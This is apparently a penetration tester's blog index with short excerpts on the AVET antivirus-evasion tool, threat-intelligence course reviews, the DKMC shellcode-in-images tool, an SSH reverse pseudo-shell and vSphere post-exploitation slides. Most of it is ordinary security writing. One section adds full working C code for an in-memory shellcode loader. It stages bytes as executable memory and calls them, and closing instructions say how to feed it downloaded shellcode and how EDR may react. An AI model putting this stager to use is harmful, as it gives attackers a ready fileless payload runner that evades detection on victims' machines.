-
Avet setup.sh script
Now there is a setup.sh script for easier installation of AVET (thanks to https://github.com/tacticaljmp). Tested with Kali Linux 2018.3a. I made two short videos: After starting the script you may have to wait for a couple of minutes. Then click through the installation routine for the compiler: … and you are done. Download AVET: https://github.com/govolution/avet
-
Paper AVET BLACKHAT USA ARSENAL 2018
Here is the paper for the Blackhat Arsenal 2018 AVET presentation: https://govolution.files.wordpress.com/2018/08/blackhat_usa_2018_arsenal.pdf Thanks to Nina and Florian for reviewing & improving!
-
Review Cybrary Advanced Cyber Threat Intelligence
Since I found that some information was missing from the course reviewed in https://govolution.wordpress.com/2018/06/30/review-udemy-certified-cyber-threat-intelligence-analyst/, I looked at another course, this time on Cybrary, which is only about 3 hours long and free. So this review will also be a bit shorter. For the content, see: https://www.cybrary.it/course/advanced-cyber-threat-intelligence/ Module 1 – Threat Intelligence Maturity Model is the intro, with…
-
Review Udemy “Certified Cyber Threat Intelligence Analyst”
As a second course (see the previous blog post for the first one) I bought “Certified Cyber Threat Intelligence Analyst”, which has the same instructor as “Certified Advanced Persistent Threat Analyst”. Section 1: Phases Overview. The first three videos give an overview of the agenda (hunting, features & behavior extraction, attribution, tracking and take down). The two videos…
-
Review Udemy “Certified Advanced Persistent Threat Analyst”
Although I am a pentester, I am also into that topic, since I also have some incident response experience. So I took the course as a wrap-up for myself; in a special offer the course cost about $10 instead of about $100. The course starts with a short introduction of the instructor, followed by…
-
Download & Exec PoC and DKMC
DKMC is a tool that writes shellcode into valid pictures and was written by Mr.Un1k0d3r (https://twitter.com/MrUn1k0d3r). I wrote a PoC that can be used with it (and of course also with other raw shellcode). The PoC downloads a shellcode file into memory and then executes the shellcode, so the payload never touches the disk. Download DKMC: https://github.com/Mr-Un1k0d3r/DKMC Update: The PoC is now…
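The download & exec pattern described above, as an added example that is not the PoC from the post and not part of AVET or DKMC: the bytes that would have been fetched from the download URL are handed to run_shellcode() already in memory (the HTTP fetch itself, done with WinINet in the original, is left out), the buffer is mapped read/write, filled, and only then flipped to read/execute (a W^X variant of the usual single RWX allocation), and the code is called as a function. The Windows branch (VirtualAlloc/VirtualProtect) mirrors the platform the original PoC targets, the POSIX branch (mmap/mprotect) is what runs here; the demo shellcode is a constructed stub that just returns 42 so the staging path can be checked without spawning anything.

```c
/*
 * Added example: stage raw shellcode that is already in memory (e.g. just
 * downloaded) and execute it without writing it to disk.
 *
 * The region is mapped RW, filled, then changed to RX (W^X) instead of
 * allocating one RWX block; both the cleaner pattern and less conspicuous.
 * Windows: VirtualAlloc / VirtualProtect.  POSIX: mmap / mprotect.
 */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE           /* MAP_ANONYMOUS on glibc */
#endif
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#endif

/* Copy the shellcode into fresh executable memory. Returns NULL on failure. */
static void *stage_shellcode(const unsigned char *sc, size_t len)
{
    if (sc == NULL || len == 0)
        return NULL;
#ifdef _WIN32
    DWORD old;
    void *p = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (p == NULL)
        return NULL;
    memcpy(p, sc, len);
    if (!VirtualProtect(p, len, PAGE_EXECUTE_READ, &old)) {
        VirtualFree(p, 0, MEM_RELEASE);
        return NULL;
    }
    FlushInstructionCache(GetCurrentProcess(), p, len);
    return p;
#else
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return NULL;
    memcpy(p, sc, len);
    if (mprotect(p, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(p, len);
        return NULL;
    }
    /* Needed where the instruction cache is not coherent with data writes
     * (AArch64); harmless on x86-64. */
    __builtin___clear_cache((char *)p, (char *)p + len);
    return p;
#endif
}

/* Stage and call the shellcode as `int fn(void)`; return what it leaves in
 * the return register, or -1 if staging failed. A real payload would not
 * return, the demo stub below does. */
int run_shellcode(const unsigned char *sc, size_t len)
{
    int (*fn)(void);
    void *p = stage_shellcode(sc, len);
    if (p == NULL)
        return -1;
    memcpy(&fn, &p, sizeof fn);   /* object -> function pointer without a cast warning */
    int rc = fn();
#ifdef _WIN32
    VirtualFree(p, 0, MEM_RELEASE);
#else
    munmap(p, len);
#endif
    return rc;
}

/* Constructed stand-in for the "downloaded" shellcode file: returns 42. */
#if defined(__x86_64__) || defined(_M_X64)
static const unsigned char demo_shellcode[] = {
    0xb8, 0x2a, 0x00, 0x00, 0x00,   /* mov eax, 42 */
    0xc3                            /* ret         */
};
#elif defined(__aarch64__)
static const unsigned char demo_shellcode[] = {
    0x40, 0x05, 0x80, 0x52,         /* mov w0, #42 */
    0xc0, 0x03, 0x5f, 0xd6          /* ret         */
};
#else
#error "demo shellcode only provided for x86-64 and AArch64"
#endif

int run_demo(void)
{
    return run_shellcode(demo_shellcode, sizeof demo_shellcode);
}

int main(void)
{
    int rc = run_demo();
    printf("shellcode returned %d\n", rc);
    return rc == 42 ? 0 : 1;
}
```

To turn this into the actual download & exec stager, replace demo_shellcode with the buffer your HTTP client fills from the download URL and pass its length; nothing else changes. Note that the mprotect()/VirtualProtect() step is exactly the point an EDR or a hardened kernel (SELinux execmem, W^X enforcement) may refuse, so the -1 path is worth keeping.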
-
Recommended Talks for the New Year (34C3, BH)
A new year always brings the talks from the Chaos Communication Congress. Since I had some time for watching, here is a list of my tweets recommending talks (plus one from Blackhat). Have fun watching. 34C3 talk 1-day exploit development for Cisco IOS by @artkond https://t.co/OvoCBvGzxc — Daniel Sauder (@DanielX4v3r) December 28, 2017 34C3…
-
Reverse (Pseudo) Shell over SSH
After exploring libssh a little bit I wanted to do something useful, so my idea was to have a kind of reverse (pseudo) shell that works via SSH: the client connects to the SSH server of the attacker with a port forward; on the attacker machine, port 8080 will be opened on localhost…
-
libssh first steps
Here I describe some first steps for using libssh on an old setup (WinXP with Visual Studio 2008). I think the steps for other platforms are more or less similar. OpenSSL: Win32OpenSSL-1_0_2m.exe from http://slproweb.com/products/Win32OpenSSL.html -> install it. zlib123dll.zip from http://www.winimage.com/zLibDll/ -> zlibwapi.dll renamed to zlib1.dll; I placed it into my working directory. libssh-0.7.2-msvc.zip from https://red.libssh.org/projects/libssh/files ->…
-
Slides Post Exploitation and Attack Vectors in vSphere
Slides from the OWASP Meeting Cologne, 14.09.17: Post_Exploitation_and_Attack_Vectors_in_vSphere